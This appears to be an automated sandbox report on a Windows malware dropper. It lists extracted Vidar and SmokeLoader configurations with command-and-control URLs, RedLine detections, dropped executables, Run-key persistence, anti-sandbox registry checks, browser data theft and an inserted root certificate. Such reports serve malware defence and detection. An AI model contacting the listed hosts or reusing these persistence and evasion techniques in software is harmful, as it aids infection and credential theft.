Analysis
-
max time kernel
155s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
22-02-2022 12:10
Static task
static1
Behavioral task
behavioral1
Sample
20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe
Resource
win10v2004-en-20220113
General
-
Target
20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe
-
Size
3.0MB
-
MD5
506099a2d031c8e0125149b59a1fa05b
-
SHA1
19899ca2344deaa10550baa2ddee596b6cd5f3dc
-
SHA256
20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd
-
SHA512
38f738638c01af661134349bd58170cd6808a1dbbfba3cf5bf980ca454df5c7f0c484d71088be3f84a817072166b68416d94567ecd2226fb207fd99b3537c861
Malware Config
Extracted
vidar
39.6
933
https://sslamlssa1.tumblr.com/
-
profile_id
933
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2044 4404 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 16 IoCs
Processes:
resource yara_rule behavioral2/memory/672-232-0x0000000000FA0000-0x0000000001157000-memory.dmp family_redline behavioral2/memory/672-235-0x0000000000FA0000-0x0000000001157000-memory.dmp family_redline behavioral2/memory/4968-233-0x0000000000F10000-0x0000000001141000-memory.dmp family_redline behavioral2/memory/672-234-0x0000000000FA2000-0x0000000000FD7000-memory.dmp family_redline behavioral2/memory/4968-240-0x0000000000F12000-0x0000000000F48000-memory.dmp family_redline behavioral2/memory/4968-244-0x0000000000F12000-0x0000000000F48000-memory.dmp family_redline behavioral2/memory/672-246-0x0000000000FA2000-0x0000000000FD7000-memory.dmp family_redline behavioral2/memory/4968-253-0x0000000000F10000-0x0000000001141000-memory.dmp family_redline behavioral2/memory/4968-251-0x0000000000F10000-0x0000000001141000-memory.dmp family_redline behavioral2/memory/672-275-0x0000000000FA0000-0x0000000001157000-memory.dmp family_redline behavioral2/memory/672-280-0x0000000000FA0000-0x0000000001157000-memory.dmp family_redline behavioral2/memory/2444-324-0x00000000003D0000-0x0000000000563000-memory.dmp family_redline behavioral2/memory/3984-330-0x0000000000ED0000-0x0000000001092000-memory.dmp family_redline behavioral2/memory/3036-355-0x0000000000A50000-0x0000000000BDB000-memory.dmp family_redline behavioral2/memory/744-366-0x0000000003B00000-0x0000000003B2F000-memory.dmp family_redline behavioral2/memory/4740-332-0x0000000000ED0000-0x0000000001092000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 14 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 936 created 4012 936 WerFault.exe rundll32.exe PID 3096 created 4956 3096 WerFault.exe sahiba_3.exe PID 2488 created 744 2488 WerFault.exe uqCVDUJhUAjxr8BMCt2X63Of.exe PID 4464 created 2056 4464 WerFault.exe Tv87Tc6Camnd790RBf4gxJby.exe PID 3664 created 2736 3664 WerFault.exe hxEA3Bezzg_aoPY_UZ9RuUqJ.exe PID 2120 created 3088 2120 WerFault.exe rVFfuLLO0G0w0fvZu7k99cka.exe PID 4568 created 5016 4568 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe PID 3492 created 2736 3492 WerFault.exe hxEA3Bezzg_aoPY_UZ9RuUqJ.exe PID 1920 created 2056 1920 WerFault.exe Tv87Tc6Camnd790RBf4gxJby.exe PID 3804 created 3088 3804 WerFault.exe rVFfuLLO0G0w0fvZu7k99cka.exe PID 3840 created 5016 3840 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe PID 2056 created 5016 2056 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe PID 4580 created 3096 4580 WerFault.exe qCR9dsXxTHldLr9xJ33ACHco.exe PID 5244 created 5016 5244 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4956-192-0x0000000000400000-0x00000000004A1000-memory.dmp family_vidar behavioral2/memory/4956-193-0x00000000009D0000-0x0000000000A6D000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\setup_install.exe aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\setup_install.exe aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCB55B48D\libstdc++-6.dll aspack_v212_v242 -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 39 IoCs
Processes:
setup_installer.exesetup_install.exesahiba_4.exesahiba_6.exesahiba_2.exesahiba_1.exesahiba_5.exesahiba_3.exesahiba_1.exejfiag3g_gg.exejfiag3g_gg.exeuqCVDUJhUAjxr8BMCt2X63Of.exeTv87Tc6Camnd790RBf4gxJby.exeIxLPgPBUBbMK1DbayU6OSonq.exehxEA3Bezzg_aoPY_UZ9RuUqJ.exevuTW7EzEPi5T9GxPChO5GZxH.exeo9svhle46RIMohDVGYzfqMGL.exeqXhIXekf4Zi4t2R_VhJA0jh7.exetbXh5S2z5iGJML7ANVbAxoHg.exe8k2t32_my_FdL7XcyTcHKNCw.exeiJLPth70h1_jTfwLAhGmnvJ7.exe6wrRkKr3GveGBomnLI9uV5iA.exebtdRcJSiX0ys6g8zh7r8SozT.exerVFfuLLO0G0w0fvZu7k99cka.exeGvvsWiHBeZH4lHGWCSJ_3fvy.exeEi4ZAHeKgC05HSIWMe_2jobF.exeqCR9dsXxTHldLr9xJ33ACHco.exeInstall.exeiJLPth70h1_jTfwLAhGmnvJ7.exe66J88.exe2FG33.exe2FG33.exeJGF18.exeL1E5D.exeF2D32.exeHE889M7AGH4HJ59.exeInstall.exewjbxjcf.exeSta.exe.pifpid process 1468 setup_installer.exe 4128 setup_install.exe 2288 sahiba_4.exe 1796 sahiba_6.exe 1528 sahiba_2.exe 4768 sahiba_1.exe 2880 sahiba_5.exe 4956 sahiba_3.exe 272 sahiba_1.exe 4296 jfiag3g_gg.exe 1980 jfiag3g_gg.exe 744 uqCVDUJhUAjxr8BMCt2X63Of.exe 2056 Tv87Tc6Camnd790RBf4gxJby.exe 2264 IxLPgPBUBbMK1DbayU6OSonq.exe 2736 hxEA3Bezzg_aoPY_UZ9RuUqJ.exe 4452 vuTW7EzEPi5T9GxPChO5GZxH.exe 520 o9svhle46RIMohDVGYzfqMGL.exe 672 qXhIXekf4Zi4t2R_VhJA0jh7.exe 3272 tbXh5S2z5iGJML7ANVbAxoHg.exe 5016 8k2t32_my_FdL7XcyTcHKNCw.exe 1748 iJLPth70h1_jTfwLAhGmnvJ7.exe 4968 6wrRkKr3GveGBomnLI9uV5iA.exe 4772 btdRcJSiX0ys6g8zh7r8SozT.exe 3088 rVFfuLLO0G0w0fvZu7k99cka.exe 116 GvvsWiHBeZH4lHGWCSJ_3fvy.exe 3696 Ei4ZAHeKgC05HSIWMe_2jobF.exe 3096 qCR9dsXxTHldLr9xJ33ACHco.exe 4328 Install.exe 540 iJLPth70h1_jTfwLAhGmnvJ7.exe 2444 66J88.exe 3984 2FG33.exe 4740 2FG33.exe 3036 JGF18.exe 2220 L1E5D.exe 408 F2D32.exe 908 HE889M7AGH4HJ59.exe 3600 Install.exe 3396 wjbxjcf.exe 4152 Sta.exe.pif -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\Documents\tbXh5S2z5iGJML7ANVbAxoHg.exe upx C:\Users\Admin\Documents\tbXh5S2z5iGJML7ANVbAxoHg.exe upx -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Ei4ZAHeKgC05HSIWMe_2jobF.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ei4ZAHeKgC05HSIWMe_2jobF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ei4ZAHeKgC05HSIWMe_2jobF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exesetup_installer.exesahiba_1.exesahiba_5.exebtdRcJSiX0ys6g8zh7r8SozT.exeGvvsWiHBeZH4lHGWCSJ_3fvy.exevuTW7EzEPi5T9GxPChO5GZxH.exeInstall.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 20c63904837367a538c8ba66cfa9058c0082c2eb33299c6e5526bf1da0f456cd.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation sahiba_1.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation sahiba_5.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation btdRcJSiX0ys6g8zh7r8SozT.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation GvvsWiHBeZH4lHGWCSJ_3fvy.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation vuTW7EzEPi5T9GxPChO5GZxH.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 10 IoCs
Processes:
setup_install.exesahiba_2.exerundll32.exerundll32.exepid process 4128 setup_install.exe 4128 setup_install.exe 4128 setup_install.exe 4128 setup_install.exe 4128 setup_install.exe 4128 setup_install.exe 1528 sahiba_2.exe 4012 rundll32.exe 4056 rundll32.exe 4056 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/3696-293-0x0000000000020000-0x00000000003E3000-memory.dmp themida behavioral2/memory/3696-304-0x0000000000020000-0x00000000003E3000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
sahiba_6.exeL1E5D.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" sahiba_6.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" L1E5D.exe -
Processes:
Ei4ZAHeKgC05HSIWMe_2jobF.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ei4ZAHeKgC05HSIWMe_2jobF.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 29 ipinfo.io 31 ipinfo.io 32 ip-api.com -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
6wrRkKr3GveGBomnLI9uV5iA.exeqXhIXekf4Zi4t2R_VhJA0jh7.exeEi4ZAHeKgC05HSIWMe_2jobF.exe66J88.exe2FG33.exe2FG33.exeJGF18.exeL1E5D.exepid process 4968 6wrRkKr3GveGBomnLI9uV5iA.exe 672 qXhIXekf4Zi4t2R_VhJA0jh7.exe 3696 Ei4ZAHeKgC05HSIWMe_2jobF.exe 2444 66J88.exe 3984 2FG33.exe 4740 2FG33.exe 3036 JGF18.exe 2220 L1E5D.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
iJLPth70h1_jTfwLAhGmnvJ7.exeIxLPgPBUBbMK1DbayU6OSonq.exewjbxjcf.exedescription pid process target process PID 1748 set thread context of 540 1748 iJLPth70h1_jTfwLAhGmnvJ7.exe iJLPth70h1_jTfwLAhGmnvJ7.exe PID 2264 set thread context of 1344 2264 IxLPgPBUBbMK1DbayU6OSonq.exe RegAsm.exe PID 3396 set thread context of 5200 3396 wjbxjcf.exe svchost.exe -
Drops file in Windows directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 636 4012 WerFault.exe rundll32.exe 3572 4956 WerFault.exe sahiba_3.exe 2176 744 WerFault.exe uqCVDUJhUAjxr8BMCt2X63Of.exe 2796 2056 WerFault.exe Tv87Tc6Camnd790RBf4gxJby.exe 3916 2736 WerFault.exe 4852 3088 WerFault.exe rVFfuLLO0G0w0fvZu7k99cka.exe 2140 5016 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe 4412 2736 WerFault.exe hxEA3Bezzg_aoPY_UZ9RuUqJ.exe 1068 2056 WerFault.exe Tv87Tc6Camnd790RBf4gxJby.exe 632 3088 WerFault.exe rVFfuLLO0G0w0fvZu7k99cka.exe 3076 5016 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe 2492 5016 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe 4220 116 WerFault.exe GvvsWiHBeZH4lHGWCSJ_3fvy.exe 5136 3096 WerFault.exe qCR9dsXxTHldLr9xJ33ACHco.exe 5316 5016 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe 5328 3396 WerFault.exe wjbxjcf.exe 5504 5016 WerFault.exe 8k2t32_my_FdL7XcyTcHKNCw.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
sahiba_2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sahiba_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sahiba_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sahiba_2.exe -
Checks processor information in registry 2 TTPs 39 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 2480 tasklist.exe 1196 tasklist.exe -
Enumerates system info in registry 2 TTPs 28 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 1 IoCs
Processes:
vuTW7EzEPi5T9GxPChO5GZxH.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings vuTW7EzEPi5T9GxPChO5GZxH.exe -
Processes:
sahiba_3.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 sahiba_3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e sahiba_3.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
